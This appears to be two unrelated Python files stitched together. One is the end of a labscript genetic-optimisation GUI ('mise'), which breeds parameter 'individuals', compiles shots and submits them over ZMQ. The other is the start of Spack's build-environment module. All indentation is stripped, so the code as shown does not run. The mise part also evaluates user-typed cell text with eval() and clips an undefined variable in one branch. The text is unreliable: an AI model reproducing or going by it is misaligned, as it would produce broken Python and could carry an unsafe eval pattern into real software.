gtk.settings_get_default().set_string_property('gtk-theme-name','Clearlooks','')
gtk.settings_get_default().set_string_property('gtk-font-name','ubuntu 11','')
gtk.settings_get_default().set_long_property('gtk-button-images',False,'')
# Have Windows 7 consider this program to be a separate app, and not
# group it with other Python programs in the taskbar:
import ctypes
myappid = 'monashbec.labscript.mise' # arbitrary string
try:
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
except:
pass
def setup_logging():
logger = logging.getLogger('mise')
handler = logging.handlers.RotatingFileHandler(r'mise.log', maxBytes=1024*1024*50)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(name)s: %(message)s')
handler.setFormatter(formatter)
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
if sys.stdout.isatty():
terminalhandler = logging.StreamHandler(sys.stdout)
terminalhandler.setFormatter(formatter)
terminalhandler.setLevel(logging.DEBUG) # only display info or higher in the terminal
logger.addHandler(terminalhandler)
logger.setLevel(logging.DEBUG)
return logger
logger = setup_logging()
labscript_utils.excepthook.set_logger(logger)
logger.info('\n\n===============starting===============\n')
class WebServer(ZMQServer):
"""A server to receive parameter spaces from runmanager, and fitness
reporting from lyse"""
def handler(self, request_data):
if request_data == 'hello':
# just a ping:
return 'hello'
elif isinstance(request_data,tuple) and len(request_data) > 1:
if request_data[0] == 'from runmanager':
# A parameter space from runmanager:
runmanager_data = request_data[1:]
with gtk.gdk.lock:
success, message = app.receive_parameter_space(runmanager_data)
return success, message
elif request_data[0] == 'from lyse':
# A fitness reported from lyse:
individual_id, fitness = request_data[1:]
with gtk.gdk.lock:
success, message = app.report_fitness(individual_id, fitness)
return success, message
success, message = False, 'Request to mise not understood\n'
return success, message
class IndividualNotFound(Exception):
"""An exception class for when an operation on an individual fails
because the individual has been deleted in the meantime."""
pass
class Individual(object):
counter = itertools.count()
all_individuals = {}
def __init__(self, genome, mutation_biases, generation):
self.genome = genome
self.id = self.counter.next()
self.fitness_visible = False
self.fitness = None
self.compile_progress_visible = True
self.compile_progress = 0
self.error_visible = None
self.waiting_visible = False
self.all_individuals[self.id] = self
self.mutation_biases = mutation_biases
self.generation = generation
def __getitem__(self,item):
return self.genome[item]
class Generation(object):
counter = itertools.count()
all_generations = {}
def __init__(self, population, parameters, previous_generation=None):
self.id = self.counter.next()
self.all_generations[self.id] = self
self.individuals = []
if previous_generation is None:
# Spawn individuals to create the first generation:
for i in range(population):
genome = {}
for name, param in parameters.items():
if param.initial is None:
# Pick a random starting value within the range:
value = numpy.random.rand()*(param.max-param.min) + param.min
else:
# Pick a value by applying one generation's worth
# of mutation to the initial value:
value = numpy.random.normal(param.initial, param.mutation_rate)
value = numpy.clip(value, param.min, param.max)
genome[name] = value
mutation_biases = {name: numpy.sign(numpy.random.normal()) for name in genome}
individual = Individual(genome, mutation_biases, self)
self.individuals.append(individual)
else:
# Create a new generation from the previous one, by 'mating'
# pairs of individuals with each other with a probability
# based on their fitnesses. First, we normalize the
# fitnesses of previous generation to create a probability
# mass function:
fitnesses = numpy.array([individual.fitness for individual in previous_generation])
sorted_fitnesses = sorted(fitnesses)
rankings = [sorted_fitnesses.index(fitness) for fitness in fitnesses]
# Must be an array of floats if the inline +=,-=,/=,*= are to operate correctly
fitnesses = numpy.array(rankings,dtype=numpy.float)
fitnesses -= fitnesses.min()
if fitnesses.max() != 0:
fitnesses /= fitnesses.max()
# Add an offset to ensure that the least fit individual
# will still have a nonzero probability of reproduction;
# approx 1/N times the most fit individual's probability:
fitnesses += 1/len(fitnesses)
fitnesses /= fitnesses.sum()
# Let mating season begin:
while len(self.individuals) < population:
# Pick parent number #1
parent_1_index = numpy.searchsorted(numpy.cumsum(fitnesses), numpy.random.rand())
# Pick parent number #2, must be different to parent #1:
parent_2_index = parent_1_index
while parent_2_index == parent_1_index:
parent_2_index = numpy.searchsorted(numpy.cumsum(fitnesses), numpy.random.rand())
parent_1 = previous_generation[parent_1_index]
parent_2 = previous_generation[parent_2_index]
# Now we have two parents. Let's mix their genomes:
child_genome = {}
child_mutation_biases = {}
for name, param in parameters.items():
# Pick a point in parameter space from a uniform
# probability distribution along the line spanned
# by the two parents:
crossover_parameter = numpy.random.rand()
# The child will inherit mutation biases from
# whichever parent it is closest to in parameter
# space:
closest_parent = (parent_1,parent_2)[int(round(crossover_parameter))]
if name in parent_1.genome and name in parent_2.genome:
lim1, lim2 = parent_1[name], parent_2[name]
child_value = crossover_parameter*(lim2-lim1) + lim1
# Pick a mutation biasing direction from one of the parents:
mutation_bias = closest_parent.mutation_biases[name]
# Possibly mutate this direction, with probability 1/population:
if numpy.random.rand() < 1/population:
mutation_bias *= -1
child_mutation_biases[name] = mutation_bias
# Apply a Gaussian mutation and clip to keep in limits:
child_value = numpy.random.normal(child_value, param.mutation_rate)
mutation_value = abs(numpy.random.normal(0, param.mutation_rate))*mutation_bias
child_value += mutation_value
child_value = numpy.clip(child_value, param.min, param.max)
else:
# The parents don't have this
# parameter. Parameters must have changed,
# we need an initial value for this parameter:
if param.initial is None:
# Pick a random starting value within the range:
child_value = numpy.random.rand()*(param.max-param.min) + param.min
else:
# Pick a value by applying one generation's worth
# of mutation to the initial value:
child_value = numpy.random.normal(param.initial, param.mutation_rate)
child_value = numpy.clip(value, param.min, param.max)
# Pick a random mutation biasing direction:
child_mutation_biases[name] = numpy.sign(numpy.random.normal())
child_genome[name] = child_value
# Congratulations, it's a boy!
child = Individual(child_genome, child_mutation_biases, self)
self.individuals.append(child)
def __iter__(self):
return iter(self.individuals)
def __getitem__(self, index):
return self.individuals[index]
# Some convenient constants for accessing liststore columns:
# Individual list store:
GENERATION = 0
ID = 1
FITNESS_VISIBLE = 2
FITNESS = 3
COMPILE_PROGRESS_VISIBLE = 4
COMPILE_PROGRESS = 5
ERROR_VISIBLE = 6
WAITING_VISIBLE = 7
# Parameter liststore:
NAME = 0
MIN = 1
MAX = 2
MUTATION_RATE = 3
LOG = 4
class Mise(object):
base_liststore_cols = ['generation',
'id',
'fitness_visible',
'fitness',
'compile_progress_visible',
'compile_progress',
'error_visible',
'waiting_visible']
base_liststore_types = {'generation': str,
'id': str,
'fitness_visible': bool,
'fitness': str,
'compile_progress_visible': bool,
'compile_progress': int,
'error_visible': bool,
'waiting_visible': bool}
def __init__(self):
# Make a gtk Builder with the user interface file:
builder = gtk.Builder()
builder.add_from_file('main.glade')
# Get required objects from the builder:
outputbox_container = builder.get_object('outputbox_container')
self.window = builder.get_object('window')
self.liststore_parameters = builder.get_object('liststore_parameters')
self.treeview_individuals = builder.get_object('treeview_individuals')
self.pause_button = builder.get_object('pause_button')
self.box_paused = builder.get_object('paused')
self.box_not_paused = builder.get_object('not_paused')
self.label_labscript_file = builder.get_object('label_labscript_file')
self.label_output_directory = builder.get_object('label_output_directory')
self.spinbutton_population = builder.get_object('spinbutton_population')
scrolledwindow_individuals = builder.get_object('scrolledwindow_individuals')
self.adjustment_treeview_individuals = scrolledwindow_individuals.get_vadjustment()
# Allow you to select multiple entries in the treeview:
self.treeselection_individuals = self.treeview_individuals.get_selection()
self.treeselection_individuals.set_mode(gtk.SELECTION_MULTIPLE)
# Connect signals:
builder.connect_signals(self)
# Show the main window:
self.window.show()
# Make an output box for terminal output. Compilations will have their output streams
# redirected to it over zmq sockets:
self.outputbox = OutputBox(outputbox_container)
# Get settings:
config_path = os.path.join(config_prefix,'%s.ini'%socket.gethostname())
required_config_params = {"paths":["experiment_shot_storage"],'ports':['mise']}
self.config = LabConfig(config_path,required_config_params)
# Start the web server:
port = self.config.get('ports','mise')
logger.info('starting web server on port %s'%port)
self.server = WebServer(port)
# A condition to let the looping threads know when to recheck conditions
# they're waiting on (instead of having them do time.sleep)
self.timing_condition = threading.Condition()
self.params = {}
self.labscript_file = None
self.population = int(self.spinbutton_population.get_value())
self.current_generation = None
self.generations = []
self.treeview_parameter_columns = []
self.new_individual_liststore()
# Start the compiler subprocess:
runmanager_dir=os.path.dirname(runmanager.__file__)
batch_compiler = os.path.join(runmanager_dir, 'batch_compiler.py')
self.to_child, self.from_child, child = subprocess_with_queues(batch_compiler,self.outputbox.port)
self.paused = False
# Whether the last scroll to the bottom of the individuals treeview has been processed:
self.scrolled = True
# A thread which looks for un-compiled individuals and compiles
# them, submitting them to BLACS:
self.compile_thread = threading.Thread(target=self.compile_loop)
self.compile_thread.daemon = True
self.compile_thread.start()
# A thread which looks for when all fitnesses have come back,
# and spawns a new generation when they have:
self.reproduction_thread = threading.Thread(target=self.reproduction_loop)
self.reproduction_thread.daemon = True
self.reproduction_thread.start()
logger.info('init done')
def destroy(self, widget):
logger.info('destroy')
gtk.main_quit()
def error_dialog(self, message):
dialog = gtk.MessageDialog(self.window, gtk.DIALOG_DESTROY_WITH_PARENT, gtk.MESSAGE_WARNING,
buttons=(gtk.BUTTONS_OK), message_format = message)
result = dialog.run()
dialog.destroy()
def scroll_to_bottom(self):
with gtk.gdk.lock:
self.adjustment_treeview_individuals.set_value(
self.adjustment_treeview_individuals.upper - self.adjustment_treeview_individuals.page_size)
self.scrolled = True
def on_pause_button_toggled(self,button):
if button.get_active():
self.paused = True
self.box_paused.show()
self.box_not_paused.hide()
else:
self.paused = False
self.box_paused.hide()
self.box_not_paused.show()
with self.timing_condition:
self.timing_condition.notify_all()
def on_spinbutton_population_value_changed(self, widget):
self.population = int(self.spinbutton_population.get_value())
print self.population
def on_parameter_min_edited(self, renderer, rowindex, value):
row = self.liststore_parameters[int(rowindex)]
name = row[NAME]
param = self.params[name]
try:
value = float(eval(value))
except Exception as e:
self.error_dialog(str(e))
return
if value >= param.max:
self.error_dialog('Must have min < max.')
return
param.min = value
row[MIN] = value
def on_parameter_max_edited(self, renderer, rowindex, value):
row = self.liststore_parameters[int(rowindex)]
name = row[NAME]
param = self.params[name]
try:
value = float(eval(value))
except Exception as e:
self.error_dialog(str(e))
return
if value <= param.min:
self.error_dialog('Must have max > min.')
return
param.max = value
row[MAX] = value
def on_parameter_mutationrate_edited(self, renderer, rowindex, value):
row = self.liststore_parameters[int(rowindex)]
name = row[NAME]
param = self.params[name]
try:
value = float(eval(value))
except Exception as e:
self.error_dialog(str(e))
return
param.mutation_rate = value
row[MUTATION_RATE] = value
def on_parameter_logarithmic_toggled(self, renderer, rowindex):
row = self.liststore_parameters[int(rowindex)]
name = row[NAME]
param = self.params[name]
param.log = not param.log
row[LOG] = param.log
def receive_parameter_space(self, runmanager_data):
"""Receive a parameter space dictionary from runmanger"""
(labscript_file, sequenceglobals, shots,
output_folder, shuffle, BLACS_server, BLACS_port, shared_drive_prefix) = runmanager_data
self.params = {}
self.liststore_parameters.clear()
# Pull out the MiseParameters:
first_shot = shots[0]
for name, value in first_shot.items():
if isinstance(value, MiseParameter):
data = [name, value.min, value.max, value.mutation_rate]
self.liststore_parameters.append(data)
self.params[name] = value
self.new_individual_liststore()
if self.current_generation is None:
self.new_generation()
self.labscript_file = labscript_file
self.sequenceglobals = sequenceglobals
self.shots = shots
self.output_folder = output_folder
self.shuffle = shuffle
self.BLACS_server = BLACS_server
self.BLACS_port = BLACS_port
self.shared_drive_prefix = shared_drive_prefix
self.label_labscript_file.set_text(self.labscript_file)
self.label_output_directory.set_text(self.output_folder)
# Let waiting threads know that there might be new state for them to check:
with self.timing_condition:
self.timing_condition.notify_all()
return True, 'optimisation request added successfully\n'
def report_fitness(self, individual_id, fitness):
found = False
if self.current_generation is None:
return False, 'mise is not initialised, there are no individuals requiring fitness reports.'
for individual in self.current_generation:
if individual.id == individual_id:
found = True
break
if not found:
return False, 'individual with id %d not found in current generation'%individual_id
individual.fitness = fitness
self.set_value(individual, FITNESS, fitness)
individual.fitness_visible = True
self.set_value(individual, FITNESS_VISIBLE, individual.fitness_visible)
individual.waiting_visible = False
self.set_value(individual, WAITING_VISIBLE, individual.waiting_visible)
# The reproduction_loop will want to check whether its time for a new generation:
with self.timing_condition:
self.timing_condition.notify_all()
return True, None
def append_generation_to_liststore(self, generation):
for individual in generation:
row = [generation.id,
individual.id,
individual.fitness_visible,
individual.fitness,
individual.compile_progress_visible,
individual.compile_progress,
individual.error_visible,
individual.waiting_visible]
row += [individual[name] for name in self.params]
self.liststore_individuals.append(row)
def new_individual_liststore(self):
column_names = self.base_liststore_cols + self.params.keys()
column_types = [self.base_liststore_types[name] for name in self.base_liststore_cols] + [str for name in self.params]
self.liststore_individuals = gtk.ListStore(*column_types)
self.treeview_individuals.set_model(self.liststore_individuals)
for generation in self.generations:
self.append_generation_to_liststore(generation)
# Make sure the Treeview has columns for the current parameters:
for param_name in self.params:
if not param_name in self.treeview_parameter_columns:
self.treeview_parameter_columns.append(param_name)
model_column_index = column_names.index(param_name)
renderer = gtk.CellRendererText()
widget = gtk.HBox()
heading = gtk.Label(param_name)
heading.show()
column = gtk.TreeViewColumn()
column.pack_start(renderer)
column.set_widget(heading)
column.add_attribute(renderer, 'text', model_column_index)
column.set_resizable(True)
column.set_reorderable(True)
self.treeview_individuals.append_column(column)
def set_value(self, individual, column, value):
"""Searches the liststore for the individual, setting the
value of a particular column in the individual's row. Raises
IndividualNotFound if the row is not found. You must acquire
the gtk lock before calling this method."""
for row in self.liststore_individuals:
if int(row[ID]) == individual.id:
row[column] = value
return
raise IndividualNotFound
def on_button_delete_individuals_clicked(self, button):
model, selection = self.treeselection_individuals.get_selected_rows()
# Have to delete one at a time, since the indices change after
# each deletion:
while selection:
path = selection[0]
iter = model.get_iter(path)
individual_id = int(model.get_value(iter, ID))
# Delete the individual's entry from the liststore:
model.remove(iter)
# Get the individual itself:
individual = Individual.all_individuals[individual_id]
# Delete it from the record of all individuals:
del Individual.all_individuals[individual_id]
# Delete it from its parent generation's record of individuals:
generation = individual.generation
generation.individuals.remove(individual)
# Update selection now that deletion of this individual is complete:
selection = self.treeview_individuals.get_selection()
model, selection = selection.get_selected_rows()
def on_button_mark_uncompiled_clicked(self,button):
model, selection = self.treeselection_individuals.get_selected_rows()
for path in selection:
iter = model.get_iter(path)
individual_id = int(model.get_value(iter, ID))
individual = Individual.all_individuals[individual_id]
if individual.compile_progress == 100:
individual.compile_progress = 0
self.set_value(individual, COMPILE_PROGRESS, individual.compile_progress)
individual.compile_progress_visible = True
self.set_value(individual, COMPILE_PROGRESS_VISIBLE, individual.compile_progress_visible)
individual.error_visible = False
self.set_value(individual, ERROR_VISIBLE, individual.error_visible)
individual.waiting_visible = False
self.set_value(individual, WAITING_VISIBLE, individual.waiting_visible)
individual.fitness = None
self.set_value(individual, FITNESS, individual.fitness)
individual.fitness_visible = False
self.set_value(individual, FITNESS_VISIBLE, individual.fitness_visible)
with self.timing_condition:
self.timing_condition.notify_all()
def on_button_clear_fitness_clicked(self,button):
model, selection = self.treeselection_individuals.get_selected_rows()
for path in selection:
iter = model.get_iter(path)
individual_id = int(model.get_value(iter, ID))
individual = Individual.all_individuals[individual_id]
if individual.fitness is not None:
individual.waiting_visible = True
self.set_value(individual, WAITING_VISIBLE, individual.waiting_visible)
individual.fitness = None
self.set_value(individual, FITNESS, individual.fitness)
individual.fitness_visible = False
self.set_value(individual, FITNESS_VISIBLE, individual.fitness_visible)
def compile_one_individual(self,individual):
# Create a list of shot globals for this individual, by copying
# self.shots and replacing MiseParameters with their values for
# this individual:
shots = []
for shot in self.shots:
this_shot = shot.copy()
for param_name in individual.genome:
this_shot[param_name] = individual[param_name]
shots.append(this_shot)
# Create run files:
sequence_id = runmanager.generate_sequence_id(self.labscript_file) + '_g%di%d'%(self.current_generation.id, individual.id)
n_run_files = len(shots)
try:
run_files = runmanager.make_run_files(self.output_folder, self.sequenceglobals, shots, sequence_id, self.shuffle)
with gtk.gdk.lock:
individual.error_visible = False
self.set_value(individual, ERROR_VISIBLE, individual.error_visible)
for i, run_file in enumerate(run_files):
with h5py.File(run_file) as hdf5_file:
hdf5_file.attrs['individual id'] = individual.id
hdf5_file.attrs['generation'] = self.current_generation.id
self.to_child.put(['compile',[self.labscript_file,run_file]])
while True:
signal,data = self.from_child.get()
if signal == 'done':
success = data
break
else:
raise RuntimeError((signal, data))
if not success:
raise Exception
else:
with gtk.gdk.lock:
individual.compile_progress = 100*float(i+1)/n_run_files
self.set_value(individual, COMPILE_PROGRESS, individual.compile_progress)
if individual.compile_progress == 100:
individual.compile_progress_visible = False
self.set_value(individual, COMPILE_PROGRESS_VISIBLE, individual.compile_progress_visible)
individual.waiting_visible = True
self.set_value(individual, WAITING_VISIBLE, individual.waiting_visible)
self.submit_job(run_file)
except IndividualNotFound:
# The Individial has been deleted at some point. It's gone,
# so we don't have to worry about where we were up to with
# anything. It will be garbage collected....now:
return
except Exception as e :
# Couldn't make or run files, couldn't compile, or couldn't
# submit. Print the error, pause mise, and display error icon:
self.outputbox.output(str(e) + '\n', red = True)
with gtk.gdk.lock:
self.pause_button.set_active(True)
individual.compile_progress = 0
self.set_value(individual, COMPILE_PROGRESS, individual.compile_progress)
individual.compile_progress_visible = False
self.set_value(individual, COMPILE_PROGRESS_VISIBLE, individual.compile_progress_visible)
individual.error_visible = True
self.set_value(individual, ERROR_VISIBLE, individual.error_visible)
individual.waiting_visible = False
self.set_value(individual, WAITING_VISIBLE, individual.waiting_visible)
def submit_job(self, run_file):
# Workaround to force python not to use IPv6 for the request:
host = socket.gethostbyname(self.BLACS_server)
agnostic_path = labscript_utils.shared_drive.path_to_agnostic(run_file)
self.outputbox.output('Submitting run file %s.\n'%os.path.basename(run_file))
try:
response = zmq_get(self.BLACS_port, host, data=agnostic_path)
if 'added successfully' in response:
self.outputbox.output(response)
else:
raise Exception(response)
except Exception as e:
self.outputbox.output('Couldn\'t submit job to control server: %s\n'%str(e),red=True)
raise
def compile_loop(self):
while True:
with self.timing_condition:
while self.paused or self.current_generation is None:
self.timing_condition.wait()
logger.info('compile loop iteration')
# Get the next individual requiring compilation:
compile_required = False
for individual in self.current_generation:
if individual.compile_progress == 0:
logger.info('individual %d needs compiling'%individual.id)
compile_required = True
break
# If we didn't find any individuals requiring compilation,
# wait until a timing_condition notification before checking
# again:
if not compile_required:
logger.info('no individuals requiring compilation')
self.timing_condition.wait()
continue
# OK, we have an individual which requires compilation.
self.compile_one_individual(individual)
def reproduction_loop(self):
while True:
while self.paused or self.current_generation is None:
with self.timing_condition:
self.timing_condition.wait()
logger.info('reproduction loop iteration')
if not all([individual.fitness is not None for individual in self.current_generation]):
# Still waiting on at least one individual, do not spawn a new generation yet
with self.timing_condition:
self.timing_condition.wait()
continue
# OK, all fitnesses are reported. Mating season is upon us:
with gtk.gdk.lock:
self.new_generation()
def new_generation(self):
self.current_generation = Generation(self.population, self.params, self.current_generation)
self.generations.append(self.current_generation)
self.append_generation_to_liststore(self.current_generation)
if self.scrolled:
# Are we scrolled to the bottom of the TreeView?
if self.adjustment_treeview_individuals.value == self.adjustment_treeview_individuals.upper - self.adjustment_treeview_individuals.page_size:
self.scrolled = False
gobject.idle_add(self.scroll_to_bottom)
# There are new individuals, the compile_loop will want to know about this:
with self.timing_condition:
self.timing_condition.notify_all()
if __name__ == '__main__':
gtk.threads_init()
app = Mise()
with gtk.gdk.lock:
gtk.main()
|
build_environment.py
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This module contains all routines related to setting up the package
build environment. All of this is set up by package.py just before
install() is called.
There are two parts to the build environment:
1. Python build environment (i.e. install() method)
This is how things are set up when install() is called. Spack
takes advantage of each package being in its own module by adding a
bunch of command-like functions (like configure(), make(), etc.) in
the package's module scope. Ths allows package writers to call
them all directly in Package.install() without writing 'self.'
everywhere. No, this isn't Pythonic. Yes, it makes the code more
readable and more like the shell script from which someone is
likely porting.
2. Build execution environment
This is the set of environment variables, like PATH, CC, CXX,
etc. that control the build. There are also a number of
environment variables used to pass information (like RPATHs and
other information about dependencies) to Spack's compiler wrappers.
All of these env vars are also set up here.
Skimming this module is a nice way to get acquainted with the types of
calls you can make from within the install() function.
"""
import re
import inspect
import multiprocessing
import os
import shutil
import sys
import traceback
import types
from six import StringIO
import llnl.util.tty as tty
from llnl.util.tty.color import cescape, colorize
from llnl.util.filesystem import mkdirp, install, install_tree
from llnl.util.lang import dedupe
import spack.build_systems.cmake
import spack.build_systems.meson
import spack.config
import spack.main
import spack.paths
import spack.schema.environment
import spack.store
import spack.architecture as arch
from spack.util.string import plural
from spack.util.environment import (
env_flag, filter_system_paths, get_path, is_system_path,
EnvironmentModifications, validate, preserve_environment)
from spack.util.environment import system_dirs
from spack.error import NoLibrariesError, NoHeadersError
from spack.util.executable import Executable
from spack.util.module_cmd import load_module, get_path_from_module, module
from spack.util.log_parse import parse_log_events, make_log_context
#
# This can be set by the user to globally disable parallel builds.
#
SPACK_NO_PARALLEL_MAKE = 'SPACK_NO_PARALLEL_MAKE'
#
# These environment variables are set by
# set_build_environment_variables and used to pass parameters to
# Spack's compiler wrappers.
#
SPACK_ENV_PATH = 'SPACK_ENV_PATH'
SPACK_INCLUDE_DIRS = 'SPACK_INCLUDE_DIRS'
SPACK_LINK_DIRS = 'SPACK_LINK_DIRS'
SPACK_RPATH_DIRS = 'SPACK_RPATH_DIRS'
SPACK_RPATH_DEPS = 'SPACK_RPATH_DEPS'
SPACK_LINK_DEPS = 'SPACK_LINK_DEPS'
SPACK_PREFIX = 'SPACK_PREFIX'
SPACK_INSTALL = 'SPACK_INSTALL'
SPACK_DEBUG = 'SPACK_DEBUG'
SPACK_SHORT_SPEC = 'SPACK_SHORT_SPEC'
SPACK_DEBUG_LOG_ID = 'SPACK_DEBUG_LOG_ID'
SPACK_DEBUG_LOG_DIR = 'SPACK_DEBUG_LOG_DIR'
SPACK_CCACHE_BINARY = 'SPACK_CCACHE_BINARY'
SPACK_SYSTEM_DIRS = 'SPACK_SYSTEM_DIRS'
# Platform-specific library suffix.
dso_suffix = 'dylib' if sys.platform == 'darwin' else 'so'
class MakeExecutable(Executable):
"""Special callable executable object for make so the user can specify
parallelism options on a per-invocation basis. Specifying
'parallel' to the call will override whatever the package's
global setting is, so you can either default to true or false and
override particular calls. Specifying 'jobs_env' to a particular
call will name an environment variable which will be set to the
parallelism level (without affecting the normal invocation with
-j).
Note that if the SPACK_NO_PARALLEL_MAKE env var is set it overrides
everything.
"""
def __init__(self, name, jobs):
super(MakeExecutable, self).__init__(name)
self.jobs = jobs
def __call__(self, *args, **kwargs):
"""parallel, and jobs_env from kwargs are swallowed and used here;
remaining arguments are passed through to the superclass.
"""
disable = env_flag(SPACK_NO_PARALLEL_MAKE)
parallel = (not disable) and kwargs.pop('parallel', self.jobs > 1)
if parallel:
args = ('-j{0}'.format(self.jobs),) + args
jobs_env = kwargs.pop('jobs_env', None)
if jobs_env:
# Caller wants us to set an environment variable to
# control the parallelism.
kwargs['extra_env'] = {jobs_env: str(self.jobs)}
return super(MakeExecutable, self).__call__(*args, **kwargs)
def clean_environment():
# Stuff in here sanitizes the build environment to eliminate
# anything the user has set that may interfere. We apply it immediately
# unlike the other functions so it doesn't overwrite what the modules load.
env = EnvironmentModifications()
# Remove these vars from the environment during build because they
# can affect how some packages find libraries. We want to make
# sure that builds never pull in unintended external dependencies.
env.unset('LD_LIBRARY_PATH')
env.unset('LIBRARY_PATH')
env.unset('CPATH')
env.unset('LD_RUN_PATH')
env.unset('DYLD_LIBRARY_PATH')
env.unset('DYLD_FALLBACK_LIBRARY_PATH')
# On Cray "cluster" systems, unset CRAY_LD_LIBRARY_PATH to avoid
# interference with Spack dependencies.
# CNL requires these variables to be set (or at least some of them,
# depending on the CNL version).
hostarch = arch.Arch(arch.platform(), 'default_os', 'default_target')
on_cray = str(hostarch.platform) == 'cray'
using_cnl = re.match(r'cnl\d+', str(hostarch.os))
if on_cray and not using_cnl:
env.unset('CRAY_LD_LIBRARY_PATH')
for varname in os.environ.keys():
if 'PKGCONF' in varname:
env.unset(varname)
# Unset the following variables because they can affect installation of
# Autotools and CMake packages.
build_system_vars = [
'CC', 'CFLAGS', 'CPP', 'CPPFLAGS', # C variables
'CXX', 'CCC', 'CXXFLAGS', 'CXXCPP', # C++ variables
'F77', 'FFLAGS', 'FLIBS', # Fortran77 variables
'FC', 'FCFLAGS', 'FCLIBS', # Fortran variables
'LDFLAGS', 'LIBS' # linker variables
]
for v in build_system_vars:
env.unset(v)
build_lang = spack.config.get('config:build_language')
if build_lang:
# Override language-related variables. This can be used to force
# English compiler messages etc., which allows parse_log_events to
# show useful matches.
env.set('LC_ALL', build_lang)
# Remove any macports installs from the PATH. The macports ld can
# cause conflicts with the built-in linker on el capitan. Solves
# assembler issues, e.g.:
# suffix or operands invalid for `movq'"
path = get_path('PATH')
for p in path:
if '/macports/' in p:
env.remove_path('PATH', p)
env.apply_modifications()
def set_compiler_environment_variables(pkg, env):
assert pkg.spec.concrete
compiler = pkg.compiler
spec = pkg.spec
# Make sure the executables for this compiler exist
compiler.verify_executables()
# Set compiler variables used by CMake and autotools
assert all(key in compiler.link_paths for key in (
'cc', 'cxx', 'f77', 'fc'))
# Populate an object with the list of environment modifications
# and return it
# TODO : add additional kwargs for better diagnostics, like requestor,
# ttyout, ttyerr, etc.
link_dir = spack.paths.build_env_path
# Set SPACK compiler variables so that our wrapper knows what to call
if compiler.cc:
env.set('SPACK_CC', compiler.cc)
env.set('CC', os.path.join(link_dir, compiler.link_paths['cc']))
if compiler.cxx:
env.set('SPACK_CXX', compiler.cxx)
env.set('CXX', os.path.join(link_dir, compiler.link_paths['cxx']))
if compiler.f77:
env.set('SPACK_F77', compiler.f77)
env.set('F77', os.path.join(link_dir, compiler.link_paths['f77']))
if compiler.fc:
env.set('SPACK_FC', compiler.fc)
env.set('FC', os.path.join(link_dir, compiler.link_paths['fc']))
# Set SPACK compiler rpath flags so that our wrapper knows what to use
env.set('SPACK_CC_RPATH_ARG', compiler.cc_rpath_arg)
env.set('SPACK_CXX_RPATH_ARG', compiler.cxx_rpath_arg)
env.set('SPACK_F77_RPATH_ARG', compiler.f77_rpath_arg)
env.set('SPACK_FC_RPATH_ARG', compiler.fc_rpath_arg)
env.set('SPACK_LINKER_ARG', compiler.linker_arg)
# Check whether we want to force RPATH or RUNPATH
if spack.config.get('config:shared_linking') == 'rpath':
env.set('SPACK_DTAGS_TO_STRIP', compiler.enable_new_dtags)
env.set('SPACK_DTAGS_TO_ADD', compiler.disable_new_dtags)
else:
env.set('SPACK_DTAGS_TO_STRIP', compiler.disable_new_dtags)
env.set('SPACK_DTAGS_TO_ADD', compiler.enable_new_dtags)
# Set the target parameters that the compiler will add
isa_arg = spec.architecture.target.optimization_flags(compiler)
env.set('SPACK_TARGET_ARGS', isa_arg)
# Trap spack-tracked compiler flags as appropriate.
# env_flags are easy to accidentally override.
inject_flags = {}
env_flags = {}
build_system_flags = {}
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Always convert flag_handler to function type.
# This avoids discrepencies in calling conventions between functions
# and methods, or between bound and unbound methods in python 2.
# We cannot effectively convert everything to a bound method, which
# would be the simpler solution.
if isinstance(pkg.flag_handler, types.FunctionType):
handler = pkg.flag_handler
else:
if sys.version_info >= (3, 0):
handler = pkg.flag_handler.__func__
else:
handler = pkg.flag_handler.im_func
injf, envf, bsf = handler(pkg, flag, spec.compiler_flags[flag])
inject_flags[flag] = injf or []
env_flags[flag] = envf or []
build_system_flags[flag] = bsf or []
# Place compiler flags as specified by flag_handler
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Concreteness guarantees key safety here
if inject_flags[flag]:
# variables SPACK_<FLAG> inject flags through wrapper
var_name = 'SPACK_{0}'.format(flag.upper())
env.set(var_name, ' '.join(f for f in inject_flags[flag]))
if env_flags[flag]:
# implicit variables
env.set(flag.upper(), ' '.join(f for f in env_flags[flag]))
pkg.flags_to_build_system_args(build_system_flags)
env.set('SPACK_COMPILER_SPEC', str(spec.compiler))
env.set('SPACK_SYSTEM_DIRS', ':'.join(system_dirs))
compiler.setup_custom_environment(pkg, env)
return env
def set_build_environment_variables(pkg, env, dirty):
"""Ensure a clean install environment when we build packages.
This involves unsetting pesky environment variables that may
affect the build. It also involves setting environment variables
used by Spack's compiler wrappers.
Args:
pkg: The package we are building
env: The build environment
dirty (bool): Skip unsetting the user's environment settings
"""
# Gather information about various types of dependencies
build_deps = set(pkg.spec.dependencies(deptype=('build', 'test')))
link_deps = set(pkg.spec.traverse(root=False, deptype=('link')))
build_link_deps = build_deps | link_deps
rpath_deps = get_rpath_deps(pkg)
link_dirs = []
include_dirs = []
rpath_dirs = []
# The top-level package is always RPATHed. It hasn't been installed yet
# so the RPATHs are added unconditionally (e.g. even though lib64/ may
# not be created for the install).
for libdir in ['lib', 'lib64']:
lib_path = os.path.join(pkg.prefix, libdir)
rpath_dirs.append(lib_path)
# Set up link, include, RPATH directories that are passed to the
# compiler wrapper
for dep in link_deps:
if is_system_path(dep.prefix):
continue
query = pkg.spec[dep.name]
dep_link_dirs = list()
try:
dep_link_dirs.extend(query.libs.directories)
except NoLibrariesError:
tty.debug("No libraries found for {0}".format(dep.name))
for default_lib_dir in ['lib', 'lib64']:
default_lib_prefix = os.path.join(dep.prefix, default_lib_dir)
if os.path.isdir(default_lib_prefix):
dep_link_dirs.append(default_lib_prefix)
link_dirs.extend(dep_link_dirs)
if dep in rpath_deps:
rpath_dirs.extend(dep_link_dirs)
try:
include_dirs.extend(query.headers.directories)
except NoHeadersError:
tty.debug("No headers found for {0}".format(dep.name))
link_dirs = list(dedupe(filter_system_paths(link_dirs)))
include_dirs = list(dedupe(filter_system_paths(include_dirs)))
rpath_dirs = list(dedupe(filter_system_paths(rpath_dirs)))
env.set(SPACK_LINK_DIRS, ':'.join(link_dirs))
env.set(SPACK_INCLUDE_DIRS, ':'.join(include_dirs))
